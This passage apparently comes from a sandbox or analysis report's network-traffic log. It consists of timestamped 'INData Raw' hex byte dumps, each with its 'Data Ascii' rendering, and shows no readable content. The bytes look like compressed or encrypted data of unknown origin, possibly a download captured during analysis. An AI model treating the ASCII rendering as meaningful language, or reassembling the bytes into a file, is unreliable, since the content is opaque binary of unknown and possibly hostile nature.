                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24984INData Raw: 2b 68 78 1b 4a 8e f9 51 46 c7 05 a5 72 e0 23 66 23 0a 59 08 98 1d f7 5e 90 dc a0 01 c6 ab fb 49 5e 15 32 e2 5d 36 d2 d6 0d ac dd bc 4b 12 8b 33 9e b7 1f dc c7 20 aa c9 e6 ea 25 ec 42 50 19 42 58 14 03 2e 9e 4d 1d 46 94 03 a5 96 5d b9 40 89 a3 57 b9 da e5 15 d6 ba 82 90 a6 43 98 ed 65 9d 86 e9 98 b0 d7 2f b7 08 b3 ef 8d 1a 24 cb de f5 38 dc a4 31 c4 f1 e6 88 69 c5 e8 45 d9 ec e2 40 24 a2 a5 b6 b5 3e da eb 8a 76 b2 ac f5 72 02 20 77 6a 02 6f 62 c4 35 4f 75 9a f0 6f f7 27 4a f7 08 d0 6b 1b 13 aa a8 0d dd b5 30 ab 60 f9 bd 64 76 1b 62 4b 80 aa b7 14 fa f9 5f 3b 81 40 31 12 c6 10 06 fa 52 e1 74 bc 72 dc f0 22 ce 1e 6e 59 56 28 82 80 87 be c4 ce 3a d4 48 19 cd 8b 66 49 0e 7c e1 02 e3 da 02 c2 02 f3 a7 f2 90 8f ad b2 ce e1 b1 38 33 12 50 e4 a7 e8 b5 b4 bd 1b 9a
                                                                                                                                                                                                                                    Data Ascii: +hxJQFr#f#Y^I^2]6K3 %BPBX.MF]@WCe/$81iE@$>vr wjob5Ouo'Jk0`dvbK_;@1Rtr"nYV(:HfI|83P
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25000INData Raw: 7b 34 09 03 18 10 12 82 49 87 17 66 41 c4 7d 5b f7 7f f6 93 50 90 ba 3a dc 49 30 81 13 d3 59 f4 9d 23 b8 25 2b f5 62 6a 34 c9 87 de 8d bc 54 e8 58 2f e9 bb 4d 09 8a 67 52 ac 51 e0 3e 94 d4 58 46 ac 84 eb b3 b9 65 5a 85 23 ed 02 51 87 ae 1c 40 0d cf a0 f8 db 37 d7 56 70 02 f5 77 ec 04 93 2f eb bb f6 4f db f4 10 68 51 8e 28 03 41 a8 9c 5f 33 48 8f 6b ff 1a 9c e3 81 45 9b 7d fc 10 ee 4c 81 bf 12 59 2a 9e 14 7d 9b b3 4a f5 d6 04 63 54 26 f3 2c 85 98 e9 62 e3 3e 4d f0 77 c5 3c d9 99 5f 11 57 fc 21 70 ae 75 4e cb 36 8e 81 fd d3 ee ee 0c 0a e6 9f bf 17 dd f9 8f fb 7c 0d 58 8e 65 b4 ad 37 3e c5 bb b8 58 33 2a af a0 2b cd 31 fc e0 3e 6e 3a 22 8b f3 2c 3a 8f 66 33 ad 57 a9 09 4b ee 02 0d 8b f1 8e 6f 10 31 fc 85 73 2b 87 fb fe af 34 5a 95 e4 d2 e6 fd b3 89 7a a5 24
                                                                                                                                                                                                                                    Data Ascii: {4IfA}[P:I0Y#%+bj4TX/MgRQ>XFeZ#Q@7Vpw/OhQ(A_3HkE}LY*}JcT&,b>Mw<_W!puN6|Xe7>X3*+1>n:",:f3WKo1s+4Zz$
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25016INData Raw: 71 c1 bf 8f fd 27 47 2f 5a 85 0b a1 1e 43 1e be 40 81 88 7b dd 75 44 26 b6 11 8e b9 f6 c3 c7 5c 8b 76 ba 8d 67 bd f1 31 f3 f7 db 7d 9a 8b 14 55 7e be 3f 1c a7 56 5b 24 ba 0e 3d 0e e9 9e 17 b5 1e 48 30 9f a9 09 b8 1d 8a a8 aa 4c 38 7b d7 c3 50 3b b4 c2 11 13 6f 3d c5 1f 28 e0 da d6 e5 5c a7 c8 fb 02 21 10 14 4f f0 6c 32 72 ae 23 15 55 6f e9 16 c9 20 b5 eb de 86 b0 b4 8a 18 c1 86 02 6e 3e 51 f0 15 08 4e 3c 38 88 6b 47 b4 cf 05 fe 18 3b 20 5e 6c 69 b0 38 b7 c0 74 37 55 b7 b8 01 8d d8 a3 10 77 39 41 90 6c 28 9c fc d2 07 67 9b 88 2e 1f 76 be 3c e5 83 ca c0 39 2f f5 65 36 96 59 ae eb 50 4d 73 5d 3b 4e 3e 09 1c d9 7d 99 36 d2 05 57 9b 46 67 fb f0 f1 62 df d6 8e 46 46 b6 cd 93 4b 6d 3a 30 0e d9 5a e7 ab da 1b e5 b2 0d b4 8c 73 86 16 be 14 fc 84 7b e5 53 be d0 ec
                                                                                                                                                                                                                                    Data Ascii: q'G/ZC@{uD&\vg1}U~?V[$=H0L8{P;o=(\!Ol2r#Uo n>QN<8kG; ^li8t7Uw9Al(g.v<9/e6YPMs];N>}6WFgbFFKm:0Zs{S
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25032INData Raw: f4 13 f6 5b 7d 9d 0f d4 50 fd 4a 7a a4 cd 73 27 a3 ba 02 8c 91 34 2e ae a3 8d 82 3b 8e b0 6a 11 f3 6e a8 a1 fb 36 e4 60 ba 49 5e f2 5f 91 19 b1 92 2c 63 18 bd 10 17 05 4e 99 de 4c c2 ec 7c 40 7d 3e b9 16 94 77 5e 74 d2 bd e5 55 65 a4 9b c2 1b d1 e7 23 07 eb 51 b7 ed d1 7d 32 77 db d7 bd 08 88 40 ab 82 11 d0 ff d2 8a 21 e9 8e bb 5e 84 4e da 14 26 4c eb eb 8a 27 f8 46 f2 86 f5 3b 55 8f 51 92 85 6e c5 6f 3a 3e 83 8f 80 09 1c 03 c3 d7 55 fa 16 7e 83 61 28 77 14 af 01 1c 63 03 a1 d0 a9 10 97 f5 38 d7 78 2b cf 5a 3f 7e 08 be 12 e7 71 e1 87 bf e3 8d 45 53 7d ca 20 23 4e e0 01 eb f4 7e 1e 2f 16 99 06 69 b6 28 03 d6 d1 df 09 e0 13 5f c4 fb d3 63 67 62 e1 d9 ef 25 77 9d e0 34 81 c4 79 5b f5 16 c2 6b 76 43 40 bf b7 1e 7a 8e 57 d7 7e 36 86 f1 66 99 28 48 31 e9 e6 48
                                                                                                                                                                                                                                    Data Ascii: [}PJzs'4.;jn6`I^_,cNL|@}>w^tUe#Q}2w@!^N&L'F;UQno:>U~a(wc8x+Z?~qES} #N~/i(_cgb%w4y[kvC@zW~6f(H1H
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25048INData Raw: 7a c2 7e 07 e0 2b 96 19 03 a0 bc 1b f3 89 fe 45 85 95 df 30 dc 8b fd b2 89 a0 6b 93 19 8c 01 30 ec 16 a1 4f 80 b9 1b a9 8c e6 7e 7e 8e 9d 7e db da e7 e9 f2 f8 c8 3e c1 e9 43 11 3d 0b 65 ad af 4b 81 e7 65 a5 4c 1b 7e e3 86 7e 16 6f c7 fe f8 61 68 1b 60 a1 4a f4 48 4f 3c a5 07 b8 b9 36 e0 b8 59 7f 63 59 8b 05 01 44 eb a9 83 e6 5c 87 dc a9 15 3a 66 59 d2 18 af 0a b9 c6 6d b7 5c 8f 21 34 c5 b9 1b a8 00 29 c4 78 3a 3d 39 a9 fb bb 39 5f f8 4f 85 ad 91 2f 98 fd ff 0d a6 0e 06 eb 0d db 9c b2 d6 aa 4b 32 bf 53 f9 9b 6c f0 cc 65 4e 17 27 03 b3 41 18 5e 88 58 5d a5 42 2d 8a 0a 6f 7b 83 ca 0b 69 dd a6 00 65 91 ed 86 f5 5e a0 de 3a da fe f6 c0 dc b7 0f 72 c6 50 ae 54 77 0e 69 84 fb 03 1c cb e7 e7 f1 d8 42 e6 e4 16 5f d3 da 02 15 2f 1b b9 b4 4d 30 fc ab 55 9a e7 34 9d
                                                                                                                                                                                                                                    Data Ascii: z~+E0k0O~~~>C=eKeL~~oah`JHO<6YcYD\:fYm\!4)x:=99_O/K2SleN'A^X]B-o{ie^:rPTwiB_/M0U4
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25064INData Raw: f0 45 c9 ae 67 29 1a 82 b4 22 eb cd cb 19 f5 3c 05 49 23 8e 33 a9 cd 97 e4 12 f8 56 df a4 a8 ed fa 45 23 d2 42 dc 7c 61 e0 c3 ec 6b 8e 7a e1 67 e9 db 8d 54 32 b8 45 30 ac 68 54 d2 bf d3 b7 5b 3a 2f ea 79 62 4e cc ce 00 2c ac 01 22 89 2d b8 58 97 7b 84 67 a7 41 24 1d 98 17 6f 88 81 34 17 37 bc fc 24 4b d6 4e 9c 92 db 6e 5f 7a 3e 87 06 be 0a fe ed 8b 29 3e 5a e5 4a 90 db 35 c3 60 40 e9 10 85 79 3c 6a 91 22 03 bb 2e cf 9e 42 60 e8 b3 cd 86 b8 fc 1f 40 dd eb 4a 5d 06 a8 37 2a 50 b3 8b f8 59 1d 71 52 20 a4 be 5a 51 1d db b9 25 2e 6f 71 5b 31 8a 78 70 d0 23 5d 45 4a e0 d8 a6 72 da 1a da bc db 30 04 64 05 07 5a 69 ca e5 d4 d4 5b e9 0a 47 c8 db eb 5d 9d 83 b6 f6 7e 9b 6b 33 ed af 5e 1f f5 b0 1a a0 b4 31 a9 6b 0e 0e 6e 2f f1 04 8e bb e8 36 74 45 2a 75 05 a4 42 75
                                                                                                                                                                                                                                    Data Ascii: Eg)"<I#3VE#B|akzgT2E0hT[:/ybN,"-X{gA$o47$KNn_z>)>ZJ5`@y<j".B`@J]7*PYqR ZQ%.oq[1xp#]EJr0dZi[G]~k3^1kn/6tE*uBu
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25080INData Raw: 08 a3 dd 0e 12 c5 96 45 0b c6 4e 62 95 3b 9c 31 68 88 69 cd e7 6b f5 a0 9f 35 64 ea 48 80 0b 99 51 45 b4 32 d2 8b 12 2d de 01 5a 15 60 53 37 af a0 d1 47 dd 23 a4 45 71 d9 49 ef 99 74 97 1e e4 b3 23 8b 80 de f7 f2 a6 80 5a 39 e0 5d e2 e7 7e d3 54 3e 58 d6 6e 6c dd d8 f8 ff 7f b0 25 72 dc 99 84 60 be 75 27 d7 50 7a 4f a9 6a d8 ef a3 65 73 ae 48 08 30 c9 15 11 fa 7a ed 35 75 98 98 a3 00 57 fd 42 c6 9b 43 2f 93 da 56 f6 62 f0 70 c0 12 1d 99 2e 00 ca ca e1 bf 47 92 9c a5 14 95 c5 d7 00 8f e4 7d 75 6b 62 e4 1b 4f e4 3d ba 42 b6 ec 47 c6 3e 0c 4a 63 10 c6 39 d1 33 c1 2a 97 9d e3 6a 70 3c a0 1c 97 4a 5a e1 00 45 e8 2c 11 25 e6 8a 41 26 d1 e0 42 a7 49 db 40 bb 18 c4 02 8e f5 35 3f 06 5b 4d 85 96 5f 84 07 c5 4c 95 1f 1a 0e 60 2d 91 62 46 76 dc 77 0a 7a 92 74 98 f8
                                                                                                                                                                                                                                    Data Ascii: ENb;1hik5dHQE2-Z`S7G#EqIt#Z9]~T>Xnl%r`u'PzOjesH0z5uWBC/Vbp.G}ukbO=BG>Jc93*jp<JZE,%A&BI@5?[M_L`-bFvwzt
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25096INData Raw: 81 fa 97 2d 7e 61 dd 69 90 68 21 cb a4 e0 bb 94 26 36 d8 34 44 97 10 05 b7 4f 96 e5 e5 4f d7 a9 a8 65 2f 54 0a 8d 6d 5e 0e b8 ad 5a 4b 61 22 0f b9 60 d9 0d f7 34 2f fa c0 77 b9 04 0f 78 9d e1 70 33 9b 3a b5 71 3b 91 3d 52 76 7c 55 ea 8a fb aa 42 ac a1 b6 3d fd fc 12 39 17 c5 1b 45 9d 59 8a a3 be 0e 57 72 b1 f9 b7 93 88 ea 5d 71 8c 91 8b ba a3 80 66 89 16 c8 16 23 c5 2b 30 16 6c e8 83 e2 14 06 3e 81 7d 45 c9 be 7d 0d e6 4f 3b 99 f3 a8 d6 b5 79 d5 8e 31 33 ae 11 a7 97 3c 59 38 2c c1 0f a2 07 5e 66 e7 74 f5 5b e2 f7 37 2a 4d 10 df 0b ec 4a f4 4c 1c cf c7 da 55 98 c1 c8 c7 f2 19 6b 85 ec bc f0 b4 3d 3e 87 5d 64 ab 36 ee 68 79 98 81 8a 74 a3 3c a0 08 71 c0 39 62 7c df e4 06 90 42 f3 6d d5 60 d8 c9 d8 6b ab 05 79 49 0e 09 38 c1 cd a8 ea b7 63 07 3c 16 0c c3 a8
                                                                                                                                                                                                                                    Data Ascii: -~aih!&64DOOe/Tm^ZKa"`4/wxp3:q;=Rv|UB=9EYWr]qf#+0l>}E}O;y13<Y8,^ft[7*MJLUk=>]d6hyt<q9b|Bm`kyI8c<
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25112INData Raw: 2a 18 48 68 74 5b 8b 79 8f 78 dd 14 ac d6 0d ec 9a 85 ef 12 34 cd 0e 86 1a 35 48 67 0a 1d 87 06 7d 7e e7 9b 91 4d 20 b7 e2 95 3e 1c 53 2a 93 fb 3a da 7b 22 a7 20 c7 5c 28 c3 87 03 1a 3b 85 c8 e4 2c 4c 63 89 b9 22 98 f6 3d 09 24 45 8f 64 ba c3 c2 e7 2a 27 82 53 9b 43 31 5e 06 87 5c 58 3a 08 38 72 8b b8 5d 84 19 cf 8c 79 e0 42 2f 03 ba c3 53 c2 b4 ee ac 86 9c 01 e0 ed 2a 25 f0 d3 f4 9b 15 95 f1 ec a1 a9 15 84 f0 f2 e3 c8 5d 44 fa 46 b4 7c 1f 6b a7 f5 f4 85 fc 6e 0f dc 3a 4e 45 de 65 d9 db bb d6 cd 1b f7 9e 37 f8 bc f9 0a cc 1a 7b 4b 25 d8 7c 15 c0 e7 6e 25 c8 b4 9f 7c 24 5d 4a f8 a8 18 f8 50 8c eb 25 65 e8 05 c1 9c 9a f8 37 0a 5f c1 df 40 42 b3 6f d9 30 f7 98 58 0e da 69 c4 2f 77 36 e7 c5 91 af 04 57 96 85 7b e9 9f cb 0d 96 8d 5e d4 aa 05 9c c4 52 03 3b 3f
                                                                                                                                                                                                                                    Data Ascii: *Hht[yx45Hg}~M >S*:{" \(;,Lc"=$Ed*'SC1^\X:8r]yB/S*%]DF|kn:NEe7{K%|n%|$]JP%e7_@Bo0Xi/w6W{^R;?
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25128INData Raw: 8e 1d 17 54 d1 71 78 d7 b3 78 73 00 c9 f2 86 e3 f0 65 5d 36 dd 3e 36 ad af 6a c5 4b 52 e1 5b b1 0c a1 35 87 de 5d b4 bf 1d 33 0c 1c e2 85 b0 7d d5 0f 6a 3e 3b fd f9 6b 21 7a 45 27 43 91 52 c4 e9 26 18 1e 24 f8 9b c4 10 34 60 0e c5 3a 09 c2 d0 6d e9 06 47 92 f4 75 6c 8e d8 d9 13 3e fc a1 1c 3f 39 cb b3 e3 79 c4 17 0a ee f2 47 37 58 74 03 f0 79 07 d6 e5 d4 01 f1 f1 6e 41 17 2a 5c ef 1b 54 43 04 f9 3e 8c 22 f3 79 eb 90 ad 7d 6e 56 42 ba 95 4b 84 ff 90 b1 68 66 02 38 46 18 84 ce 1b a4 7c 04 ab 68 86 cf 2e 4a 81 d0 61 b8 07 25 ba 2d f3 ad f0 07 ac ba 29 2b 7c eb a8 85 8c 25 ef c9 c5 f2 58 3d ca a2 7e 2f c0 19 b9 de 8a 18 e7 34 09 1c 8c 87 00 c9 f4 2b 1c 89 e1 bf 9b 1d cf e3 43 88 a2 96 39 a2 7a 50 22 3c e1 f4 c7 45 cb e1 1a 27 8a a0 fd f7 91 5b 15 e5 53 92 b5
                                                                                                                                                                                                                                    Data Ascii: Tqxxse]6>6jKR[5]3}j>;k!zE'CR&$4`:mGul>?9yG7XtynA*\TC>"y}nVBKhf8F|h.Ja%-)+|%X=~/4+C9zP"<E'[S
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25144INData Raw: 60 0d 57 bc b4 34 46 38 2d fb 69 d9 e8 7d 5a 3d 09 97 6e 78 f7 13 d6 83 7f 3e 90 9b f7 0d b5 8f f3 6f 9b b5 5d e4 e2 96 a6 91 cd 53 fa 61 ff 9d c2 cf 8a 1c 5b c2 dd 5c 3c a0 45 4f 25 29 4e 4a 88 99 04 e6 ce dc da 68 84 95 83 76 ff 41 8d c2 6b 94 6e 8c a8 83 b0 3b f4 d0 25 1d 5e 13 aa 4b d5 d0 2b 71 05 8f 2c 95 23 4b 17 ed e8 f0 5c fb 1d c4 ea 58 fd 37 92 dc ca a3 c7 01 3c 89 b3 c8 56 1f 28 f6 7d 2e 4c 3e d0 27 9b 31 2e c6 a1 7a cb ad 7a ad 0f ae d8 60 98 32 99 ad f3 84 84 bf 0e 88 63 d6 04 e6 8b 01 d0 1d 13 7b d7 8a da df 1f 9a 2d a0 98 cd ef 4b fe 08 3b 4f fe 9c 15 76 d8 ae d3 2d ad d3 0a a2 23 09 76 ae b2 f5 36 e5 c4 89 4c 9e bd 61 99 c4 42 f8 5e 03 03 89 72 2a 54 eb 29 1e 54 89 04 11 2e ca b4 5f 43 5e 92 92 92 e1 65 64 e1 0e 91 d6 f3 9a 1c 43 b7 3b c6
                                                                                                                                                                                                                                    Data Ascii: `W4F8-i}Z=nx>o]Sa[\<EO%)NJhvAkn;%^K+q,#K\X7<V(}.L>'1.zz`2c{-K;Ov-#v6LaB^r*T)T._C^edC;
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25160INData Raw: 34 f8 e9 f4 cb 35 7f 19 f5 e8 88 3a b4 60 d4 2e 72 a4 86 34 c3 5e 54 1d 1e 72 df ab 10 d2 16 29 2b b2 43 4a 83 64 1d 9b f9 6e 19 c3 15 00 44 66 1e 42 08 6a f1 e3 7d 38 81 b1 cc 72 a7 ac 50 40 93 e6 86 e4 c3 e0 6f f5 c3 c3 a0 7c 1d 64 eb 30 63 d0 80 a9 1f 75 df ff b9 da 61 a2 91 17 93 6e 8c dc da 57 67 3e 66 d6 20 fc 9c 79 c0 f8 92 68 2f 08 5d 98 68 bc 36 27 fc de 7f 47 8f a1 83 1d 93 09 65 35 ed 41 61 66 ce d9 54 41 6a 91 65 c3 61 57 f6 c8 a9 18 bb 0d 25 72 e9 90 4d 75 f5 a5 08 52 fd 45 34 75 b7 40 b0 25 44 e2 f1 1e f8 ea 63 ba 5a ad dc 75 e3 05 7a ce c9 be 84 9e e3 a9 ee 54 be 9c 6f 04 14 8e 26 f9 e0 d6 08 d8 a1 9b 20 dc 6d e3 b4 12 d5 ce 62 7d ab 7a cd 7a 62 e7 0a 13 07 a2 69 68 69 c2 e6 a1 c9 43 fa 1e a0 6e a5 57 f1 f1 1b 60 89 93 0e 7e f2 eb 31 bc 4c
                                                                                                                                                                                                                                    Data Ascii: 45:`.r4^Tr)+CJdnDfBj}8rP@o|d0cuanWg>f yh/]h6'Ge5AafTAjeaW%rMuRE4u@%DcZuzTo& mb}zzbihiCnW`~1L
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25176INData Raw: fc 8c 99 51 f5 40 0e ec d6 6e 2c 65 3d dd ce 63 29 2e 9a 7f 54 02 16 9b bb 94 5c 52 bb c1 e7 45 0d 3e b6 30 65 57 2d 7b 52 8b a8 c7 8e 42 fc 44 82 f8 f0 5c 0d a7 fc bf a1 1d ba 45 cb 55 a2 b2 87 14 c2 ce dc ef ba 8d ce 89 9a bf c5 cc c5 5e 98 8b 76 f2 59 c2 4e 27 da 90 9a ab 92 f2 1b 41 b5 e3 60 28 37 51 50 47 41 67 15 a8 91 41 ef 21 82 63 56 00 19 8c 94 7d 77 b5 c2 25 b6 ef 74 fb e1 ce 5c 7d 27 90 e5 21 14 5c f1 36 b0 72 3f f0 83 3a 8a 6c 20 f3 8b 64 ed a9 b1 80 fa fa ac 7f c7 6e eb f8 8b 1f 76 90 8c 98 50 01 4d 5c d7 cd c9 24 5f fc b7 c5 75 89 6f 45 6a 88 20 2e c3 d0 bc b5 88 10 a3 68 4c 2b 1c 8c 75 08 54 2b 09 d3 e8 c5 c1 60 76 a2 34 fc ac 79 4d 98 e8 a8 2f 3b 64 a0 69 0e ca 37 ae 81 9c 13 2b 5d ac f3 d2 b9 f4 15 62 60 dc d0 ea 5b dc 36 9d f2 54 73 dd
                                                                                                                                                                                                                                    Data Ascii: Q@n,e=c).T\RE>0eW-{RBD\EU^vYN'A`(7QPGAgA!cV}w%t\}'!\6r?:l dnvPM\$_uoEj .hL+uT+`v4yM/;di7+]b`[6Ts
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25192INData Raw: 71 62 ce ca 18 fd 60 2b 9a 93 6f 2f 34 6f 4f fb 73 88 57 55 76 b1 56 f9 60 f9 fc 84 45 ff 1c 8f cf 35 c9 97 12 61 c2 9a d8 b3 84 e0 f1 bf b5 af 8f e6 b2 f1 88 33 ce 31 8a f6 f4 47 38 ff 0a a6 03 1c 89 aa a9 1a 27 2a 65 76 09 34 68 b5 9f 53 17 c0 7f fe 1e df 74 ac ef 58 f9 cf ee 15 f0 63 87 70 92 ef 72 1b ec b0 46 5a 85 96 a7 10 f1 0f 93 ae 8f 2e 25 11 ec 91 83 ef 64 af 36 c0 ad 7f 08 54 57 ed ca 6c e8 d9 12 59 d4 53 46 29 61 f2 04 cf 03 99 67 cc 5e 57 91 99 a3 0f e1 79 a9 ee fa 56 a3 d5 5b 55 d2 bb 0d 6e 1b a0 09 27 2b b2 3b 1a 9c 83 2a 69 c1 d9 a5 91 e5 af c3 60 54 41 0f 2b 6c 15 e4 14 0b 5d a2 52 6c 2b 7a 52 b2 e4 d0 d3 a1 ac 70 24 79 7b 66 fa 06 83 6a b2 c0 ca 40 eb 48 7a 04 09 4e bd 54 07 0c 63 89 98 50 de d0 e9 e3 8a 15 7b 92 cc d7 14 c4 8e 64 c3 f2
                                                                                                                                                                                                                                    Data Ascii: qb`+o/4oOsWUvV`E5a31G8'*ev4hStXcprFZ.%d6TWlYSF)ag^WyV[Un'+;*i`TA+l]Rl+zRp$y{fj@HzNTcP{d
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25208INData Raw: d5 32 8b 6c e3 b7 d7 e6 f3 9b d9 f6 6f d8 e7 53 6e 94 1e 1e 4b 6a 0f 32 92 22 e4 68 4d 06 48 82 54 9e cf 43 8a 92 0f d1 5a 0b e4 70 d8 86 8c 44 45 14 26 84 51 4c 95 f7 15 91 94 f6 af b7 b6 80 0d 9f 82 f9 86 19 e0 c3 43 d9 b8 77 a7 6c c5 df 77 e4 32 cb 7c dc a2 99 78 6e 8d 7d 8e fc 8a ac 96 65 e4 ba b7 a5 05 5f c6 0a e3 b0 99 e9 43 89 7c 00 90 6e 60 14 66 a2 7b a9 1b 74 79 b0 55 ca f0 c8 26 87 a4 a1 e7 02 af 78 57 d5 39 1b ed 8c a4 57 2e 70 17 c0 00 47 32 b5 4a 0d 87 2b 94 73 3d 79 64 a5 4e 0d 33 75 09 00 f1 8d 38 27 49 59 71 aa 90 15 e3 3b cb 41 3e 60 d6 75 2e d8 49 0f 25 af b9 6d 4b 9e 28 39 8b 82 b2 d0 ca 9c 07 19 5c 8d eb e6 62 61 e7 6f ae c7 df 32 43 68 86 47 fc ef 53 68 d5 37 79 27 11 f2 54 a9 a2 97 16 e3 8a d4 6f 86 6d e3 b5 05 fe bd a2 38 bd fc aa
                                                                                                                                                                                                                                    Data Ascii: 2loSnKj2"hMHTCZpDE&QLCwlw2|xn}e_C|n`f{tyU&xW9W.pG2J+s=ydN3u8'IYq;A>`u.I%mK(9\bao2ChGSh7y'Tom8
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25224INData Raw: a5 fd 22 36 92 7f 9e e2 55 93 ba a5 f9 40 88 59 07 fd f2 8e ac b8 8a d9 8a f7 f6 dd 44 bb 41 66 cc 38 6e d5 0c cf e6 c4 30 b1 2c 9f 2f de 72 12 11 74 05 d8 8b 1c dd ff 27 d2 63 21 0a 29 f3 ae 54 15 4c 4a 88 87 64 1a 4a 72 f8 8c cf 07 70 7d 72 64 fe 41 13 2f 6e 95 ed b2 a8 49 b3 79 3c cf 98 73 3b 22 e4 b0 d3 69 2e 2a 24 eb d4 1c 3b 9f de e7 1f 8b 9a 9e 04 53 e9 e2 e6 49 e8 fd 81 b1 ed d5 b8 8a e7 d6 a8 ab db d6 f9 28 92 94 1b 1a fb 2b 4a d5 de 2f c4 5e 47 71 91 21 3e 1c f7 08 31 0c 14 47 69 5e db 46 5f e0 95 9e d7 d7 a1 5e 57 4b 07 0e c9 f3 6d 92 72 7c 25 71 eb 22 ae 0b 79 08 d1 c0 fe fe 9b 08 a0 6f 84 54 56 03 7c 40 d8 4e 1b 83 1b 12 08 7c 9b a3 bc e2 ec fd f6 a6 34 b3 4c 19 91 0b 99 e4 f0 b4 68 43 1b de 76 d6 cc c6 1a f9 af 57 fe cf e8 40 74 7c 3e af 66
                                                                                                                                                                                                                                    Data Ascii: "6U@YDAf8n0,/rt'c!)TLJdJrp}rdA/nIy<s;"i.*$;SI(+J/^Gq!>1Gi^F_^WKmr|%q"yoTV|@N|4LhCvW@t|>f
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25240INData Raw: 37 74 42 b5 75 03 94 50 b7 76 41 69 ce fd 49 bc 12 64 81 02 17 64 6c 23 0e 0e 81 81 df ca 79 8f ce 18 7f be 86 90 c5 2e 61 2e 80 2c 47 26 dd a1 fa a2 98 c5 e6 2e 42 74 37 0c cc 3f 77 33 2b 67 5b 6b 41 ee e7 39 b2 d2 44 78 0c 1e 4a 7d 94 38 02 b6 62 08 9e 34 62 d0 a0 44 fd 31 b9 85 52 b8 72 f2 25 19 af 4a dc 4d c5 34 cb 81 4d 1d d8 55 eb b7 29 54 d5 9d c0 35 03 95 3c 8f a9 cd d0 5f 98 fd 64 cd df 5e e6 6c 1d 92 01 9a d3 14 f1 8a 1b 75 90 14 7d cc d6 d0 76 2b 04 f2 98 e2 58 b4 f5 70 e0 16 12 07 6c 94 4f c8 2c 88 97 7a 02 22 95 3c f8 b6 f3 6f 02 2d 6a 53 ff 48 b1 5d a1 1e 11 83 f6 39 71 3e 3e ea 0d 44 c4 af fc 04 ac ea 16 73 24 d4 39 4a db 3b ae b3 6c 0c 23 41 66 40 08 93 79 74 41 34 7c 4d ae 4c b3 46 82 a4 d6 e5 85 7d 5e 32 5a 57 86 ad 09 76 24 60 4d 45 67
                                                                                                                                                                                                                                    Data Ascii: 7tBuPvAiIddl#y.a.,G&.Bt7?w3+g[kA9DxJ}8b4bD1Rr%JM4MU)T5<_d^lu}v+XplO,z"<o-jSH]9q>>Ds$9J;l#Af@ytA4|MLF}^2ZWv$`MEg
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25256INData Raw: 22 d4 8f 6f 27 8d 44 47 50 14 87 4b ba 55 09 50 fd 12 f1 48 be d8 dc d3 8d 52 c0 d2 c4 01 60 21 fb 36 43 5f 20 34 a2 f3 b6 bd a7 e4 9a ac ed 7c aa 43 69 11 92 4a 38 e6 9d 76 3f 5e 3d 77 c7 8d a6 65 93 e9 ad 7e d6 0e bf 15 3f 82 42 67 6d a9 12 a0 90 95 6a 56 77 86 9e b8 26 88 c2 6a 60 2a 12 f6 12 2c 1a 8a 97 33 1f 4e 23 59 c0 a3 36 09 70 bd 9b 96 16 8e f6 fd e3 78 af 5b 8e 9d 16 13 7d eb 8c 05 e6 55 38 55 f8 77 e0 14 f2 09 8b be 49 6b 83 6a f2 f0 84 b9 e6 e5 37 ab 05 03 11 7e 50 79 5e 09 66 41 da f8 78 bf a2 71 9a 8f 41 ce 57 46 00 5f b0 a1 ba c3 ee c0 6b be 6a 17 00 bf 0a 6c 3f ec 73 32 cd 69 d6 ba 2f 7a 7a 08 0a b7 e4 0a 6e 6b fc 8d 9d c8 67 62 65 ef 3e 1d c3 ee 6c 99 eb 44 8a 65 9d 62 a2 81 ea ac 4d 39 78 fb 90 3d 1c e3 99 a5 e4 0a 19 57 db 14 da 4b d8
                                                                                                                                                                                                                                    Data Ascii: "o'DGPKUPHR`!6C_ 4|CiJ8v?^=we~?BgmjVw&j`*,3N#Y6px[}U8UwIkj7~Py^fAxqAWF_kjl?s2i/zznkgbe>lDebM9x=WK
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25272INData Raw: 50 f9 ea f9 e5 3d b1 6d a1 0b 3e cf dc 00 6f cf d4 81 b2 78 8f 27 fb e4 27 4a 5e d5 1e d5 e0 63 c2 07 6e b6 86 5b 67 84 10 1f 5e 5a ea a0 c5 b3 cc e1 f3 98 c9 0b ef e3 1d 31 10 72 2a 6d db 76 70 10 ed ff 01 10 a6 29 35 02 5b 7d 53 5d 6d 42 df 25 8a 9a 16 2a 16 3e 40 c8 dc 99 8d 30 5b ad 40 e1 cd 13 c5 d9 04 af d2 be 6a c8 b1 e4 6b f7 74 1c e5 fa 6f 70 4e 2f 19 cb 4d 36 f8 f6 6a 2d c9 6d 2b b9 c0 b9 98 94 55 33 ab 3c 4f 52 b4 ae 0a 7f 28 21 54 df 79 44 45 22 87 99 ec c6 68 79 d4 a5 72 c2 5b 8c e5 8c 2a 87 72 65 cc 9e 1a 66 6d 8e ba 08 36 4c 5f ea 1e e1 48 b0 8f d4 77 64 49 50 cf 1e 69 b5 28 3f a6 53 b4 6f 5f 41 6b f0 74 61 79 0f 2b b2 fd c3 fa 06 1a 7a f5 65 a7 bf 46 78 a6 1f f4 13 df 22 86 f5 d3 a6 92 31 22 e3 20 da ed f3 c8 c3 28 59 04 7e 92 fe e9 42 e5
                                                                                                                                                                                                                                    Data Ascii: P=m>ox''J^cn[g^Z1r*mvp)5[}S]mB%*>@0[@jktopN/M6j-m+U3<OR(!TyDE"hyr[*refm6L_HwdIPi(?So_Aktay+zeFx"1" (Y~B
